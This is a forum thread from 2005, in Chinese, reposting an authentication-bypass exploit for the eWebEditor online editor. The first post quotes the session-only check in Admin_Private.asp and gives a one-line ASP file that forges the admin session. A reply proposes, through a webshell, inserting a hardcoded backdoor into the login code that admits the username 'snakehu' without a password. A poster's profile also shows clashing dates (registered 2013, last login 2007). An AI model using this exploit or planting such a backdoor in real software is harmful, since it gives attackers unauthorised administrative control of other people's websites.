[转载]eWebEditor session欺骗漏洞

exploit

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 1449
精华: 90
积分: 8884
阅读权限: 100
性别: 男
来自: 河北
在线时间: 153 小时
注册时间: 2013-12-25
最后登录: 2007-4-6

优秀管理奖资料收集奖

发短消息
加为好友
当前离线

楼主大中小发表于 2005-10-1 14:51 只看该作者

[转载]eWebEditor session欺骗漏洞

文章作者：nowthk

eWebEditor在线编辑器
漏洞文件:Admin_Private.asp
漏洞语句:<%

If Session("eWebEditor_User") = "" Then
Response.Redirect "admin_login.asp"
Response.End
End If

只判断了session，没有判断cookies和路径的验证问题。
漏洞利用:
新建一个test.asp内容如下:
<%Session("eWebEditor_User") = "11111111"%>
访问test.asp，再访问后台任何文件，for example:Admin_Default.asp

漏洞影响:虚拟主机的克星. by nowthk

益友网吧联盟 http://www.96-7.com

TOP

snakehu

荣誉会员

Rank: 6 Rank: 6 Rank: 6

帖子: 39
精华: 2
积分: 259
阅读权限: 100
性别: 男
在线时间: 58 小时
注册时间: 2005-8-27
最后登录: 2008-12-15

发短消息
加为好友
当前离线

沙发大中小发表于 2005-10-1 17:15 只看该作者

记得如果要session欺骗，我想那个test.asp就必须存放在对象网站上，不知道是不是。
请问如果是的话如何实现这个，通过Webshell吗？如果有webshell我觉得可以修改源文件的验证部分比较省事。

引用:

Select Case sAction
Case "LOGIN"
   s_Usr = Trim(Request("usr"))
   s_Pwd = Trim(Request("pwd"))
   If s_Usr <> "" And s_Pwd <> "" Then
      sSql = "select * from ewebeditor_system"
      oRs.Open sSql, oConn, 0, 1
      If Not oRs.Eof Then
            If oRs("sys_username") = md5(s_Usr) And oRs("sys_userpass") = md5(s_Pwd) Then
               ' 登录成功
               Session("eWebEditor_User") = s_Usr
               Session("eWebEditor_Version") = oRs("sys_version")
               Response.Redirect "admin_default.asp"
               Response.End
            End If
      End If
      oRs.Close
   End If
   sErrMsg = "提示：用户名或密码错误！"
Case "OUT"
   Session("eWebEditor_User") = ""
End Select

感觉上如果有Webshell只要在5排(If s_Usr <> "" And s_Pwd <> "" Then)前加入：

引用:

If S_Usr = "snakehu" then
   Session("eWebEditor_User") = s_Usr
   Session("eWebEditor_Version") = oRs("sys_version")
   Response.Redirect "admin_default.asp"
   Response.End
End if

小弟才疏学浅。要是错了，别笑话我哈。呵呵呵。

自在飞花轻似梦,无边丝雨细如愁. ------------------------------------------- http://senarie.spaces.live.com/